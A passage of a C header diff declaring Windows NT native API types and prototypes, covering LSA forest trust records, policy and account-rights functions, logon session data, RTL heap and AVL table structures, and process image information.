_TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES { + + ULONG SupportedEncryptionTypes; + +} TRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES, *PTRUSTED_DOMAIN_SUPPORTED_ENCRYPTION_TYPES; + +typedef enum { + + ForestTrustTopLevelName, + ForestTrustTopLevelNameEx, + ForestTrustDomainInfo, + ForestTrustRecordTypeLast = ForestTrustDomainInfo + +} LSA_FOREST_TRUST_RECORD_TYPE; + +#if (_WIN32_WINNT < 0x0502) +#define LSA_FOREST_TRUST_RECORD_TYPE_UNRECOGNIZED 0x80000000 +#endif + +// +// Bottom 16 bits of the flags are reserved for disablement reasons +// + +#define LSA_FTRECORD_DISABLED_REASONS ( 0x0000FFFFL ) + +// +// Reasons for a top-level name forest trust record to be disabled +// + +#define LSA_TLN_DISABLED_NEW ( 0x00000001L ) +#define LSA_TLN_DISABLED_ADMIN ( 0x00000002L ) +#define LSA_TLN_DISABLED_CONFLICT ( 0x00000004L ) + +// +// Reasons for a domain information forest trust record to be disabled +// + +#define LSA_SID_DISABLED_ADMIN ( 0x00000001L ) +#define LSA_SID_DISABLED_CONFLICT ( 0x00000002L ) +#define LSA_NB_DISABLED_ADMIN ( 0x00000004L ) +#define LSA_NB_DISABLED_CONFLICT ( 0x00000008L ) + +typedef struct _LSA_FOREST_TRUST_DOMAIN_INFO { + +#ifdef MIDL_PASS + PISID Sid; +#else + PSID Sid; +#endif + LSA_UNICODE_STRING DnsName; + LSA_UNICODE_STRING NetbiosName; + +} LSA_FOREST_TRUST_DOMAIN_INFO, *PLSA_FOREST_TRUST_DOMAIN_INFO; + + +#if (_WIN32_WINNT >= 0x0502) +// +// To prevent huge data to be passed in, we should put a limit on LSA_FOREST_TRUST_BINARY_DATA. +// 128K is large enough that can't be reached in the near future, and small enough not to +// cause memory problems. + +#define MAX_FOREST_TRUST_BINARY_DATA_SIZE ( 128 * 1024 ) +#endif + +typedef struct _LSA_FOREST_TRUST_BINARY_DATA { + +#ifdef MIDL_PASS + [range(0, MAX_FOREST_TRUST_BINARY_DATA_SIZE)] ULONG Length; + [size_is( Length )] PUCHAR Buffer; +#else + ULONG Length; + PUCHAR Buffer; +#endif + +} LSA_FOREST_TRUST_BINARY_DATA, *PLSA_FOREST_TRUST_BINARY_DATA; + +typedef struct _LSA_FOREST_TRUST_RECORD { + + ULONG Flags; + LSA_FOREST_TRUST_RECORD_TYPE ForestTrustType; // type of record + LARGE_INTEGER Time; + +#ifdef MIDL_PASS + [switch_type( LSA_FOREST_TRUST_RECORD_TYPE ), switch_is( ForestTrustType )] +#endif + + union { // actual data + +#ifdef MIDL_PASS + [case( ForestTrustTopLevelName, + ForestTrustTopLevelNameEx )] LSA_UNICODE_STRING TopLevelName; + [case( ForestTrustDomainInfo )] LSA_FOREST_TRUST_DOMAIN_INFO DomainInfo; + [default] LSA_FOREST_TRUST_BINARY_DATA Data; +#else + LSA_UNICODE_STRING TopLevelName; + LSA_FOREST_TRUST_DOMAIN_INFO DomainInfo; + LSA_FOREST_TRUST_BINARY_DATA Data; // used for unrecognized types +#endif + } ForestTrustData; + +} LSA_FOREST_TRUST_RECORD, *PLSA_FOREST_TRUST_RECORD; + +#if (_WIN32_WINNT >= 0x0502) +// +// To prevent forest trust blobs of large size, number of records must be +// smaller than MAX_RECORDS_IN_FOREST_TRUST_INFO +// + +#define MAX_RECORDS_IN_FOREST_TRUST_INFO 4000 +#endif + +typedef struct _LSA_FOREST_TRUST_INFORMATION { + +#ifdef MIDL_PASS + [range(0, MAX_RECORDS_IN_FOREST_TRUST_INFO)] ULONG RecordCount; + [size_is( RecordCount )] PLSA_FOREST_TRUST_RECORD * Entries; +#else + ULONG RecordCount; + PLSA_FOREST_TRUST_RECORD * Entries; +#endif + +} LSA_FOREST_TRUST_INFORMATION, *PLSA_FOREST_TRUST_INFORMATION; + +typedef enum { + + CollisionTdo, + CollisionXref, + CollisionOther + +} LSA_FOREST_TRUST_COLLISION_RECORD_TYPE; + +typedef struct _LSA_FOREST_TRUST_COLLISION_RECORD { + + ULONG Index; + LSA_FOREST_TRUST_COLLISION_RECORD_TYPE Type; + ULONG Flags; + LSA_UNICODE_STRING Name; + +} LSA_FOREST_TRUST_COLLISION_RECORD, *PLSA_FOREST_TRUST_COLLISION_RECORD; + +typedef struct _LSA_FOREST_TRUST_COLLISION_INFORMATION { + + ULONG RecordCount; +#ifdef MIDL_PASS + [size_is( RecordCount )] +#endif + PLSA_FOREST_TRUST_COLLISION_RECORD * Entries; + +} LSA_FOREST_TRUST_COLLISION_INFORMATION, *PLSA_FOREST_TRUST_COLLISION_INFORMATION; + + +// +// LSA Enumeration Context +// + +typedef ULONG LSA_ENUMERATION_HANDLE, *PLSA_ENUMERATION_HANDLE; + +// +// LSA Enumeration Information +// + +typedef struct _LSA_ENUMERATION_INFORMATION { + + PSID Sid; + +} LSA_ENUMERATION_INFORMATION, *PLSA_ENUMERATION_INFORMATION; + + +//////////////////////////////////////////////////////////////////////////// +// // +// Local Security Policy - Miscellaneous API function prototypes // +// // +//////////////////////////////////////////////////////////////////////////// + + +NTSTATUS +NTAPI +LsaFreeMemory( + IN OPTIONAL PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaClose( + IN LSA_HANDLE ObjectHandle + ); + +#if (_WIN32_WINNT >= 0x0600) + +typedef struct _LSA_LAST_INTER_LOGON_INFO { + LARGE_INTEGER LastSuccessfulLogon; + LARGE_INTEGER LastFailedLogon; + ULONG FailedAttemptCountSinceLastSuccessfulLogon; +} LSA_LAST_INTER_LOGON_INFO, *PLSA_LAST_INTER_LOGON_INFO; + +#endif + +#if (_WIN32_WINNT >= 0x0501) +typedef struct _SECURITY_LOGON_SESSION_DATA { + ULONG Size; + LUID LogonId; + LSA_UNICODE_STRING UserName; + LSA_UNICODE_STRING LogonDomain; + LSA_UNICODE_STRING AuthenticationPackage; + ULONG LogonType; + ULONG Session; + PSID Sid; + LARGE_INTEGER LogonTime; + + LSA_UNICODE_STRING LogonServer; + LSA_UNICODE_STRING DnsDomainName; + LSA_UNICODE_STRING Upn; + +#if (_WIN32_WINNT >= 0x0600) + + ULONG UserFlags; + + LSA_LAST_INTER_LOGON_INFO LastLogonInfo; + LSA_UNICODE_STRING LogonScript; + LSA_UNICODE_STRING ProfilePath; + LSA_UNICODE_STRING HomeDirectory; + LSA_UNICODE_STRING HomeDirectoryDrive; + + LARGE_INTEGER LogoffTime; + LARGE_INTEGER KickOffTime; + LARGE_INTEGER PasswordLastSet; + LARGE_INTEGER PasswordCanChange; + LARGE_INTEGER PasswordMustChange; + +#endif +} SECURITY_LOGON_SESSION_DATA, * PSECURITY_LOGON_SESSION_DATA; + +NTSTATUS +NTAPI +LsaEnumerateLogonSessions( + OUT PULONG LogonSessionCount, + OUT PLUID * LogonSessionList + ); + +NTSTATUS +NTAPI +LsaGetLogonSessionData( + IN PLUID LogonId, + OUT PSECURITY_LOGON_SESSION_DATA * ppLogonSessionData + ); + +#endif +NTSTATUS +NTAPI +LsaOpenPolicy( + IN OPTIONAL PLSA_UNICODE_STRING SystemName, + IN PLSA_OBJECT_ATTRIBUTES ObjectAttributes, + IN ACCESS_MASK DesiredAccess, + OUT PLSA_HANDLE PolicyHandle + ); + + +NTSTATUS +NTAPI +LsaQueryInformationPolicy( + IN LSA_HANDLE PolicyHandle, + IN POLICY_INFORMATION_CLASS InformationClass, + OUT PVOID *Buffer + ); + +NTSTATUS +NTAPI +LsaSetInformationPolicy( + IN LSA_HANDLE PolicyHandle, + IN POLICY_INFORMATION_CLASS InformationClass, + IN PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaQueryDomainInformationPolicy( + IN LSA_HANDLE PolicyHandle, + IN POLICY_DOMAIN_INFORMATION_CLASS InformationClass, + OUT PVOID *Buffer + ); + +NTSTATUS +NTAPI +LsaSetDomainInformationPolicy( + IN LSA_HANDLE PolicyHandle, + IN POLICY_DOMAIN_INFORMATION_CLASS InformationClass, + IN OPTIONAL PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaRegisterPolicyChangeNotification( + IN POLICY_NOTIFICATION_INFORMATION_CLASS InformationClass, + IN HANDLE NotificationEventHandle + ); + +NTSTATUS +NTAPI +LsaUnregisterPolicyChangeNotification( + IN POLICY_NOTIFICATION_INFORMATION_CLASS InformationClass, + IN HANDLE NotificationEventHandle + ); + +NTSTATUS +NTAPI +LsaEnumerateTrustedDomains( + IN LSA_HANDLE PolicyHandle, + IN OUT PLSA_ENUMERATION_HANDLE EnumerationContext, + OUT PVOID *Buffer, + IN ULONG PreferedMaximumLength, + OUT PULONG CountReturned + ); + +NTSTATUS +NTAPI +LsaLookupNames( + IN LSA_HANDLE PolicyHandle, + IN ULONG Count, + IN PLSA_UNICODE_STRING Names, + OUT PLSA_REFERENCED_DOMAIN_LIST *ReferencedDomains, + OUT PLSA_TRANSLATED_SID *Sids + ); + +#if (_WIN32_WINNT >= 0x0501) +NTSTATUS +NTAPI +LsaLookupNames2( + IN LSA_HANDLE PolicyHandle, + IN ULONG Flags, // Reserved + IN ULONG Count, + IN PLSA_UNICODE_STRING Names, + OUT PLSA_REFERENCED_DOMAIN_LIST *ReferencedDomains, + OUT PLSA_TRANSLATED_SID2 *Sids + ); +#endif + +NTSTATUS +NTAPI +LsaLookupSids( + IN LSA_HANDLE PolicyHandle, + IN ULONG Count, + IN PSID *Sids, + OUT PLSA_REFERENCED_DOMAIN_LIST *ReferencedDomains, + OUT PLSA_TRANSLATED_NAME *Names + ); + +#define SE_INTERACTIVE_LOGON_NAME TEXT("SeInteractiveLogonRight") +#define SE_NETWORK_LOGON_NAME TEXT("SeNetworkLogonRight") +#define SE_BATCH_LOGON_NAME TEXT("SeBatchLogonRight") +#define SE_SERVICE_LOGON_NAME TEXT("SeServiceLogonRight") +#define SE_DENY_INTERACTIVE_LOGON_NAME TEXT("SeDenyInteractiveLogonRight") +#define SE_DENY_NETWORK_LOGON_NAME TEXT("SeDenyNetworkLogonRight") +#define SE_DENY_BATCH_LOGON_NAME TEXT("SeDenyBatchLogonRight") +#define SE_DENY_SERVICE_LOGON_NAME TEXT("SeDenyServiceLogonRight") +#if (_WIN32_WINNT >= 0x0501) +#define SE_REMOTE_INTERACTIVE_LOGON_NAME TEXT("SeRemoteInteractiveLogonRight") +#define SE_DENY_REMOTE_INTERACTIVE_LOGON_NAME TEXT("SeDenyRemoteInteractiveLogonRight") +#endif + +NTSTATUS +NTAPI +LsaEnumerateAccountsWithUserRight( + IN LSA_HANDLE PolicyHandle, + IN OPTIONAL PLSA_UNICODE_STRING UserRight, + OUT PVOID *Buffer, + OUT PULONG CountReturned + ); + +NTSTATUS +NTAPI +LsaEnumerateAccountRights( + IN LSA_HANDLE PolicyHandle, + IN PSID AccountSid, + OUT PLSA_UNICODE_STRING *UserRights, + OUT PULONG CountOfRights + ); + +NTSTATUS +NTAPI +LsaAddAccountRights( + IN LSA_HANDLE PolicyHandle, + IN PSID AccountSid, + IN PLSA_UNICODE_STRING UserRights, + IN ULONG CountOfRights + ); + +NTSTATUS +NTAPI +LsaRemoveAccountRights( + IN LSA_HANDLE PolicyHandle, + IN PSID AccountSid, + IN BOOLEAN AllRights, + IN LSA_UNICODE_STRING UserRights, + IN ULONG CountOfRights + ); + +/////////////////////////////////////////////////////////////////////////////// +// // +// Local Security Policy - Trusted Domain Object API function prototypes // +// // +/////////////////////////////////////////////////////////////////////////////// + +NTSTATUS +NTAPI +LsaOpenTrustedDomainByName( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING TrustedDomainName, + IN ACCESS_MASK DesiredAccess, + OUT PLSA_HANDLE TrustedDomainHandle + ); + +NTSTATUS +NTAPI +LsaQueryTrustedDomainInfo( + IN LSA_HANDLE PolicyHandle, + IN PSID TrustedDomainSid, + IN TRUSTED_INFORMATION_CLASS InformationClass, + OUT PVOID *Buffer + ); + +NTSTATUS +NTAPI +LsaSetTrustedDomainInformation( + IN LSA_HANDLE PolicyHandle, + IN PSID TrustedDomainSid, + IN TRUSTED_INFORMATION_CLASS InformationClass, + IN PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaDeleteTrustedDomain( + IN LSA_HANDLE PolicyHandle, + IN PSID TrustedDomainSid + ); + +NTSTATUS +NTAPI +LsaQueryTrustedDomainInfoByName( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING TrustedDomainName, + IN TRUSTED_INFORMATION_CLASS InformationClass, + OUT PVOID *Buffer + ); + +NTSTATUS +NTAPI +LsaSetTrustedDomainInfoByName( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING TrustedDomainName, + IN TRUSTED_INFORMATION_CLASS InformationClass, + IN PVOID Buffer + ); + +NTSTATUS +NTAPI +LsaEnumerateTrustedDomainsEx( + IN LSA_HANDLE PolicyHandle, + IN OUT PLSA_ENUMERATION_HANDLE EnumerationContext, + OUT PVOID *Buffer, + IN ULONG PreferedMaximumLength, + OUT PULONG CountReturned + ); + +NTSTATUS +NTAPI +LsaCreateTrustedDomainEx( + IN LSA_HANDLE PolicyHandle, + IN PTRUSTED_DOMAIN_INFORMATION_EX TrustedDomainInformation, + IN PTRUSTED_DOMAIN_AUTH_INFORMATION AuthenticationInformation, + IN ACCESS_MASK DesiredAccess, + OUT PLSA_HANDLE TrustedDomainHandle + ); + +#if (_WIN32_WINNT >= 0x0501) +NTSTATUS +NTAPI +LsaQueryForestTrustInformation( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING TrustedDomainName, + OUT PLSA_FOREST_TRUST_INFORMATION * ForestTrustInfo + ); + +NTSTATUS +NTAPI +LsaSetForestTrustInformation( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING TrustedDomainName, + IN PLSA_FOREST_TRUST_INFORMATION ForestTrustInfo, + IN BOOLEAN CheckOnly, + OUT PLSA_FOREST_TRUST_COLLISION_INFORMATION * CollisionInfo + ); + +// #define TESTING_MATCHING_ROUTINE +#ifdef TESTING_MATCHING_ROUTINE + +NTSTATUS +NTAPI +LsaForestTrustFindMatch( + IN LSA_HANDLE PolicyHandle, + IN ULONG Type, + IN PLSA_UNICODE_STRING Name, + OUT PLSA_UNICODE_STRING * Match + ); + +#endif +#endif + +// +// This API sets the workstation password (equivalent of setting/getting +// the SSI_SECRET_NAME secret) +// + +NTSTATUS +NTAPI +LsaStorePrivateData( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING KeyName, + IN OPTIONAL PLSA_UNICODE_STRING PrivateData + ); + +NTSTATUS +NTAPI +LsaRetrievePrivateData( + IN LSA_HANDLE PolicyHandle, + IN PLSA_UNICODE_STRING KeyName, + OUT PLSA_UNICODE_STRING * PrivateData + ); + + +ULONG +NTAPI +LsaNtStatusToWinError( + IN NTSTATUS Status + ); + +#endif // _NTLSA_IFS_ +// 04.06.2011 - end + +// +// Driver entry management APIs. +// + +typedef struct _EFI_DRIVER_ENTRY { + ULONG Version; + ULONG Length; + ULONG Id; + ULONG FriendlyNameOffset; + ULONG DriverFilePathOffset; + //WCHAR FriendlyName[ANYSIZE_ARRAY]; + //FILE_PATH DriverFilePath; +} EFI_DRIVER_ENTRY, *PEFI_DRIVER_ENTRY; + +typedef struct _EFI_DRIVER_ENTRY_LIST { + ULONG NextEntryOffset; + EFI_DRIVER_ENTRY DriverEntry; +} EFI_DRIVER_ENTRY_LIST, *PEFI_DRIVER_ENTRY_LIST; + +#define EFI_DRIVER_ENTRY_VERSION 1 +#define MAX_STACK_DEPTH 32 + +typedef struct _RTL_STACK_CONTEXT_ENTRY { + ULONG_PTR Address; // stack address + ULONG_PTR Data; // stack contents +} RTL_STACK_CONTEXT_ENTRY, * PRTL_STACK_CONTEXT_ENTRY; + +typedef struct _RTL_STACK_CONTEXT { + ULONG NumberOfEntries; + RTL_STACK_CONTEXT_ENTRY Entry[1]; +} RTL_STACK_CONTEXT, * PRTL_STACK_CONTEXT; + +typedef NTSTATUS + (NTAPI * PRTL_HEAP_COMMIT_ROUTINE)( + IN PVOID Base, + IN OUT PVOID *CommitAddress, + IN OUT PSIZE_T CommitSize + ); + +typedef struct _RTL_HEAP_PARAMETERS +{ + ULONG Length; + SIZE_T SegmentReserve; + SIZE_T SegmentCommit; + SIZE_T DeCommitFreeBlockThreshold; + SIZE_T DeCommitTotalFreeThreshold; + SIZE_T MaximumAllocationSize; + SIZE_T VirtualMemoryThreshold; + SIZE_T InitialCommit; + SIZE_T InitialReserve; + PRTL_HEAP_COMMIT_ROUTINE CommitRoutine; + SIZE_T Reserved[2]; +} RTL_HEAP_PARAMETERS, *PRTL_HEAP_PARAMETERS; + +#define HEAP_SETTABLE_USER_VALUE 0x00000100 +#define HEAP_SETTABLE_USER_FLAG1 0x00000200 +#define HEAP_SETTABLE_USER_FLAG2 0x00000400 +#define HEAP_SETTABLE_USER_FLAG3 0x00000800 +#define HEAP_SETTABLE_USER_FLAGS 0x00000e00 + +#define HEAP_CLASS_0 0x00000000 // Process heap +#define HEAP_CLASS_1 0x00001000 // Private heap +#define HEAP_CLASS_2 0x00002000 // Kernel heap +#define HEAP_CLASS_3 0x00003000 // GDI heap +#define HEAP_CLASS_4 0x00004000 // User heap +#define HEAP_CLASS_5 0x00005000 // Console heap +#define HEAP_CLASS_6 0x00006000 // User desktop heap +#define HEAP_CLASS_7 0x00007000 // CSR shared heap +#define HEAP_CLASS_8 0x00008000 // CSR port heap +#define HEAP_CLASS_MASK 0x0000f000 + +struct _RTL_AVL_TABLE; + +typedef struct _RTL_SPLAY_LINKS { + struct _RTL_SPLAY_LINKS *Parent; + struct _RTL_SPLAY_LINKS *LeftChild; + struct _RTL_SPLAY_LINKS *RightChild; +} RTL_SPLAY_LINKS; +typedef RTL_SPLAY_LINKS *PRTL_SPLAY_LINKS; + +typedef enum _TABLE_SEARCH_RESULT +{ + TableEmptyTree, + TableFoundNode, + TableInsertAsLeft, + TableInsertAsRight +} TABLE_SEARCH_RESULT; + +typedef enum _RTL_GENERIC_COMPARE_RESULTS +{ + GenericLessThan, + GenericGreaterThan, + GenericEqual +} RTL_GENERIC_COMPARE_RESULTS; + +struct _RTL_AVL_TABLE; + +typedef RTL_GENERIC_COMPARE_RESULTS (NTAPI *PRTL_AVL_COMPARE_ROUTINE)( + IN struct _RTL_AVL_TABLE *Table, + IN PVOID FirstStruct, + IN PVOID SecondStruct + ); + +typedef PVOID (NTAPI *PRTL_AVL_ALLOCATE_ROUTINE)( + IN struct _RTL_AVL_TABLE *Table, + IN CLONG ByteSize + ); + +typedef VOID (NTAPI *PRTL_AVL_FREE_ROUTINE)( + IN struct _RTL_AVL_TABLE *Table, + IN PVOID Buffer + ); + +typedef NTSTATUS (NTAPI *PRTL_AVL_MATCH_FUNCTION)( + IN struct _RTL_AVL_TABLE *Table, + IN PVOID UserData, + IN PVOID MatchData + ); + +typedef + RTL_GENERIC_COMPARE_RESULTS + (NTAPI *PRTL_AVL_COMPARE_ROUTINE) ( + struct _RTL_AVL_TABLE *Table, + PVOID FirstStruct, + PVOID SecondStruct + ); + +typedef + PVOID + (NTAPI *PRTL_AVL_ALLOCATE_ROUTINE) ( + struct _RTL_AVL_TABLE *Table, + ULONG ByteSize + ); + + +typedef + NTSTATUS + (NTAPI *PRTL_AVL_MATCH_FUNCTION) ( + struct _RTL_AVL_TABLE *Table, + PVOID UserData, + PVOID MatchData + ); + +typedef + RTL_GENERIC_COMPARE_RESULTS + (NTAPI *PRTL_GENERIC_COMPARE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID FirstStruct, + PVOID SecondStruct + ); + +typedef + PVOID + (NTAPI *PRTL_GENERIC_ALLOCATE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + ULONG ByteSize + ); + +typedef + VOID + (NTAPI *PRTL_GENERIC_FREE_ROUTINE) ( + struct _RTL_GENERIC_TABLE *Table, + PVOID Buffer + ); + +typedef struct _RTL_BALANCED_LINKS +{ + struct _RTL_BALANCED_LINKS *Parent; + struct _RTL_BALANCED_LINKS *LeftChild; + struct _RTL_BALANCED_LINKS *RightChild; + CHAR Balance; + UCHAR Reserved[3]; +} RTL_BALANCED_LINKS, *PRTL_BALANCED_LINKS; + +typedef struct _RTL_AVL_TABLE +{ + RTL_BALANCED_LINKS BalancedRoot; + PVOID OrderedPointer; + ULONG WhichOrderedElement; + ULONG NumberGenericTableElements; + ULONG DepthOfTree; + PRTL_BALANCED_LINKS RestartKey; + ULONG DeleteCount; + PRTL_AVL_COMPARE_ROUTINE CompareRoutine; + PRTL_AVL_ALLOCATE_ROUTINE AllocateRoutine; + PRTL_AVL_FREE_ROUTINE FreeRoutine; + PVOID TableContext; +} RTL_AVL_TABLE, *PRTL_AVL_TABLE; + +typedef struct _RTL_GENERIC_TABLE { + PRTL_SPLAY_LINKS TableRoot; + LIST_ENTRY InsertOrderList; + PLIST_ENTRY OrderedPointer; + ULONG WhichOrderedElement; + ULONG NumberGenericTableElements; + PRTL_GENERIC_COMPARE_ROUTINE CompareRoutine; + PRTL_GENERIC_ALLOCATE_ROUTINE AllocateRoutine; + PRTL_GENERIC_FREE_ROUTINE FreeRoutine; + PVOID TableContext; +} RTL_GENERIC_TABLE; +typedef RTL_GENERIC_TABLE *PRTL_GENERIC_TABLE; + +typedef struct _GENERATE_NAME_CONTEXT { + + USHORT Checksum; + BOOLEAN ChecksumInserted; + + UCHAR NameLength; // not including extension + WCHAR NameBuffer[8]; // e.g., "ntoskrnl" + + ULONG ExtensionLength; // including dot + WCHAR ExtensionBuffer[4]; // e.g., ".exe" + + ULONG LastIndexValue; + +} GENERATE_NAME_CONTEXT; +typedef GENERATE_NAME_CONTEXT *PGENERATE_NAME_CONTEXT; + +typedef struct _PREFIX_TABLE_ENTRY { + CSHORT NodeTypeCode; + CSHORT NameLength; + struct _PREFIX_TABLE_ENTRY *NextPrefixTree; + RTL_SPLAY_LINKS Links; + PSTRING Prefix; +} PREFIX_TABLE_ENTRY; +typedef PREFIX_TABLE_ENTRY *PPREFIX_TABLE_ENTRY; + +typedef struct _PREFIX_TABLE { + CSHORT NodeTypeCode; + CSHORT NameLength; + PPREFIX_TABLE_ENTRY NextPrefixTree; +} PREFIX_TABLE; +typedef PREFIX_TABLE *PPREFIX_TABLE; + +typedef struct _UNICODE_PREFIX_TABLE_ENTRY { + CSHORT NodeTypeCode; + CSHORT NameLength; + struct _UNICODE_PREFIX_TABLE_ENTRY *NextPrefixTree; + struct _UNICODE_PREFIX_TABLE_ENTRY *CaseMatch; + RTL_SPLAY_LINKS Links; + PUNICODE_STRING Prefix; +} UNICODE_PREFIX_TABLE_ENTRY; +typedef UNICODE_PREFIX_TABLE_ENTRY *PUNICODE_PREFIX_TABLE_ENTRY; + +typedef struct _UNICODE_PREFIX_TABLE { + CSHORT NodeTypeCode; + CSHORT NameLength; + PUNICODE_PREFIX_TABLE_ENTRY NextPrefixTree; + PUNICODE_PREFIX_TABLE_ENTRY LastNextEntry; +} UNICODE_PREFIX_TABLE; +typedef UNICODE_PREFIX_TABLE *PUNICODE_PREFIX_TABLE; + +#define COMPRESSION_FORMAT_NONE (0x0000) // winnt +#define COMPRESSION_FORMAT_DEFAULT (0x0001) // winnt +#define COMPRESSION_FORMAT_LZNT1 (0x0002) // winnt + +#define COMPRESSION_ENGINE_STANDARD (0x0000) // winnt +#define COMPRESSION_ENGINE_MAXIMUM (0x0100) // winnt +#define COMPRESSION_ENGINE_HIBER (0x0200) // winnt + +typedef struct _COMPRESSED_DATA_INFO { + + USHORT CompressionFormatAndEngine; + + UCHAR CompressionUnitShift; + UCHAR ChunkShift; + UCHAR ClusterShift; + UCHAR Reserved; + USHORT NumberOfChunks; + ULONG CompressedChunkSizes[ANYSIZE_ARRAY]; + +} COMPRESSED_DATA_INFO; +typedef COMPRESSED_DATA_INFO *PCOMPRESSED_DATA_INFO; + +typedef struct _SECTION_IMAGE_INFORMATION { + PVOID TransferAddress; + ULONG ZeroBits; + UCHAR Alignment[4]; + SIZE_T MaximumStackSize; + SIZE_T CommittedStackSize; + ULONG SubSystemType; + union { + struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + union + { + UCHAR ImageFlags; + struct + { + BOOLEAN ComPlusNativeReady : 1; + BOOLEAN ComPlusILOnly : 1; + BOOLEAN ImageDynamicallyRelocated : 1; + BOOLEAN ImageMappedFlat : 1; + BOOLEAN Reserved : 4; + }; + }; + + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG CheckSum; +} SECTION_IMAGE_INFORMATION, *PSECTION_IMAGE_INFORMATION; + +typedef struct _SECTION_IMAGE_INFORMATION64 { + ULONGLONG TransferAddress; + ULONG ZeroBits; + ULONGLONG MaximumStackSize; + ULONGLONG CommittedStackSize; + ULONG SubSystemType; + union { + struct { + USHORT SubSystemMinorVersion; + USHORT SubSystemMajorVersion; + }; + ULONG SubSystemVersion; + }; + ULONG GpValue; + USHORT ImageCharacteristics; + USHORT DllCharacteristics; + USHORT Machine; + BOOLEAN ImageContainsCode; + BOOLEAN Spare1; + ULONG LoaderFlags; + ULONG ImageFileSize; + ULONG Reserved[ 1 ]; +} SECTION_IMAGE_INFORMATION64, *PSECTION_IMAGE_INFORMATION64; + +typedef struct _RTL_BITMAP { + ULONG SizeOfBitMap; + UCHAR Padding[4]; + PULONG Buffer; +} RTL_BITMAP; +typedef RTL_BITMAP *PRTL_BITMAP; + +#define RTL_USER_PROC_CURDIR_CLOSE 0x00000002 +#define RTL_USER_PROC_CURDIR_INHERIT 0x00000003 + +#define RTL_RANGE_SHARED 0x01 +#define RTL_RANGE_CONFLICT 0x02 + +typedef struct _RTL_RANGE_LIST { + LIST_ENTRY ListHead; + ULONG Flags; // use RANGE_LIST_FLAG_* + ULONG Count; + ULONG Stamp; +} RTL_RANGE_LIST, *PRTL_RANGE_LIST; + +typedef enum { + RtlBsdItemVersionNumber = 0x00, + RtlBsdItemProductType, + RtlBsdItemAabEnabled, + RtlBsdItemAabTimeout, + RtlBsdItemBootGood, + RtlBsdItemBootShutdown, + RtlBsdItemMax +} RTL_BSD_ITEM_TYPE, *PRTL_BSD_ITEM_TYPE; + +typedef struct _RANGE_LIST_ITERATOR { + PLIST_ENTRY RangeListHead; + PLIST_ENTRY MergedHead; + PVOID Current; + ULONG Stamp; +} RTL_RANGE_LIST_ITERATOR, *PRTL_RANGE_LIST_ITERATOR; + +typedef struct _STARTUP_ARGUMENT +{ + //ULONG Unknown[ 3 ]; + UNICODE_STRING Unknown[ 3 ]; + PRTL_USER_PROCESS_PARAMETERS Environment; +} STARTUP_ARGUMENT, *PSTARTUP_ARGUMENT; + +#define RTL_USER_PROC_PARAMS_NORMALIZED 0x00000001 +#define RTL_USER_PROC_PROFILE_USER 0x00000002 +#define RTL_USER_PROC_PROFILE_KERNEL 0x00000004 +#define RTL_USER_PROC_PROFILE_SERVER 0x00000008 +#define RTL_USER_PROC_RESERVE_1MB 0x00000020 +#define RTL_USER_PROC_RESERVE_16MB 0x00000040 +#define RTL_USER_PROC_CASE_SENSITIVE 0x00000080 +#define RTL_USER_PROC_DISABLE_HEAP_DECOMMIT 0x00000100 +#define RTL_USER_PROC_DLL_REDIRECTION_LOCAL 0x00001000 +#define RTL_USER_PROC_APP_MANIFEST_PRESENT 0x00002000 +#define RTL_USER_PROC_IMAGE_KEY_MISSING 0x00004000 +#define RTL_USER_PROC_OPTIN_PROCESS 0x00020000 + +typedef NTSTATUS (*PUSER_PROCESS_START_ROUTINE)( + PRTL_USER_PROCESS_PARAMETERS ProcessParameters + ); + +typedef NTSTATUS (*PUSER_THREAD_START_ROUTINE)( + PVOID ThreadParameter + ); + +typedef struct _RTL_USER_PROCESS_INFORMATION { + ULONG Length; + HANDLE Process; + HANDLE Thread; + CLIENT_ID ClientId; + SECTION_IMAGE_INFORMATION ImageInformation; +} RTL_USER_PROCESS_INFORMATION, *PRTL_USER_PROCESS_INFORMATION; + +typedef struct _RTL_USER_PROCESS_INFORMATION64 { + ULONG Length; + LONGLONG Process; + LONGLONG Thread; + CLIENT_ID64 ClientId; + SECTION_IMAGE_INFORMATION64 ImageInformation; +} RTL_USER_PROCESS_INFORMATION64, *PRTL_USER_PROCESS_INFORMATION64; + +#define RTL_TRACE_IN_USER_MODE 0x00000001 +#define RTL_TRACE_IN_KERNEL_MODE 0x00000002 +#define RTL_TRACE_USE_NONPAGED_POOL 0x00000004 +#define RTL_TRACE_USE_PAGED_POOL 0x00000008 + +typedef struct _RTL_RESOURCE { + + RTL_CRITICAL_SECTION CriticalSection; + + HANDLE SharedSemaphore; + ULONG NumberOfWaitingShared; + HANDLE ExclusiveSemaphore; + ULONG NumberOfWaitingExclusive; + + LONG NumberOfActive; + HANDLE ExclusiveOwnerThread; + + ULONG Flags; // See RTL_RESOURCE_FLAG_ equates below. + + PRTL_RESOURCE_DEBUG DebugInfo; +} RTL_RESOURCE, *PRTL_RESOURCE; + +#define RTL_RESOURCE_FLAG_LONG_TERM ((ULONG) 0x00000001) + +typedef struct _RTL_TRACE_BLOCK { + ULONG Magic; + ULONG Count; + ULONG Size; + + SIZE_T UserCount; + SIZE_T UserSize; + PVOID UserContext; + + struct _RTL_TRACE_BLOCK * Next; + PVOID * Trace; +} RTL_TRACE_BLOCK, * PRTL_TRACE_BLOCK; + +typedef ULONG (* RTL_TRACE_HASH_FUNCTION) (ULONG Count, PVOID * Trace); +typedef struct _RTL_TRACE_DATABASE * PRTL_TRACE_DATABASE; + +typedef struct 